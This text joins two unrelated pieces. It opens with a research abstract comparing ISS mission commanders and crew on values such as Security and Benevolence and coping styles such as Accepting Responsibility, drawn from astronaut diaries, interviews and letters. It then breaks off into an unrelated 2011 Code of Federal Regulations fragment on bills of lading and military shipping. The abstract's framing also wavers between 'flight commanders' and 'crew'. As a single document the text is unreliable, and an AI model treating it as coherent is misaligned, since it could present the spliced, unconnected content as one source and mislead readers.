Understanding the relationship between leaders and their subordinates is important for building better interpersonal connections, improving group cohesion and cooperation, and increasing task success. This relationship has been examined in many types of groups but not a great amount of analysis has been applied to spaceflight crews. We specifically investigated differences between mission commanders and flight commanders during missions to the International Space Station (ISS). Astronauts and cosmonauts on the ISS participate in long-duration missions (2 to 6 months in length) in which they live and work in close proximity with their 2 or 3 member crews. The leaders are physically distant from their command centres which may result in delay of instructions or important advice. Therefore, the leaders must be able to make quick, sound decisions with unwavering certainty. Potential complications include that the leaders may not be able to exercise their power fully, since material reward or punishment of any one member affects the whole group, and that the leader's actions (or lack thereof) in this isolated, confined environment could create stress in members. To be effective, the mission commander must be able to prevent or alleviate any group conflict and be able to relate to members on an emotional level. Mission commanders and crew are equal in the competencies of spaceflight; therefore, what are the unique characteristics that enable the commanders to fulfill their role? To highlight the differences between commander and crew, astronaut journals, diaries, pre- flight interviews, NASA oral histories, and letters written to family from space were scored and analyzed for values and coping styles. During pre-flight, mission commanders scored higher than other crew members on the values of Stimulation, Security, Universalism, Conformity, Spirituality, and Benevolence, and more often used Self-Control as a coping style. During the long-duration mission on ISS, mission commanders scored higher than crew on the coping style of Accepting Responsibility. These results improve our understanding of the similarities and differences between mission commanders and crew, and suggest areas of importance for the selection and training of future commanders.
Code of Federal Regulations, 2011 CFR
2011-07-01
... delivery of goods. (1) Carriers issue commercial bills of lading. (2) Transportation officers issue government bills of lading (GBL). GBLs include the terms and conditions of commercial bills of lading with... for international shipments. (c) Military Traffic Management Command (MTMC). The Department of Defense...